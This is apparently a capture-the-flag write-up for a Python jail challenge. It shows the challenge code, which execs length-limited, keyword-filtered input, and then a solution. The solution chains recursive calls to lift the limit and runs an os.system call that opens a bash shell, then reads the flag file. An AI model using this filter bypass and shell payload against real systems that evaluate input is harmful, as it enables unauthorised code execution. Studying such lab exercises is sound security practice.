๐ฉ Filter'd
๐ Before you start
You can donate to me via Buy Me a Coffee or follow me on Github
๐ Challenge Statement
#!/usr/local/bin/python3
M = 14 # no malicious code could ever be executed since this limit is so low, right?
def f(code):
assert len(code) <= M
assert all(ord(c) < 128 for c in code)
assert all(q not in code for q in ["exec", "eval", "breakpoint", "help", "license", "exit", "quit"])
exec(code, globals())
f(input("> "))
๐ฉ Getting the Flag
When we arrive at this jail challenge, hereโs what we absolutely need to consider:
- We cannot use the keywords
exec,eval,breakpoint,help,license,exit,quit. - We cannot use non-ASCII characters.
- Our payload must be <= 14 characters.
- We are executing code with an
execin theglobals()scope.
Everything is perfect! I can see how to approach this. First, let's try to call the function f recursively.
> a=input();f(a)
b=input();f(b)
M=1000;f(a)
__import__('os').system('/bin/bash')
ls -la
total 16
drwxr-xr-x 1 nobody nogroup 4096 Jul 1 04:46 .
drwxr-xr-x 1 nobody nogroup 4096 Jul 1 04:46 ..
-r--r--r-- 1 nobody nogroup 46 Jul 1 04:39 flag.txt
-rwxr-xr-x 1 nobody nogroup 342 Jul 1 04:45 run
cat flag.txt
jail{can_you_repeat_that_for_me?_aacb7144d2c}
Thanks Exec โค๏ธ
Fortunately, we have exec, as it allows us to define variables and use them in our code. Without it, we wouldn't have been able to get the flag.
And there you go, we have the flag. It's as simple as that.
๐ Support
๐ Before you leave
You can donate to me via Buy Me a Coffee or follow me on Github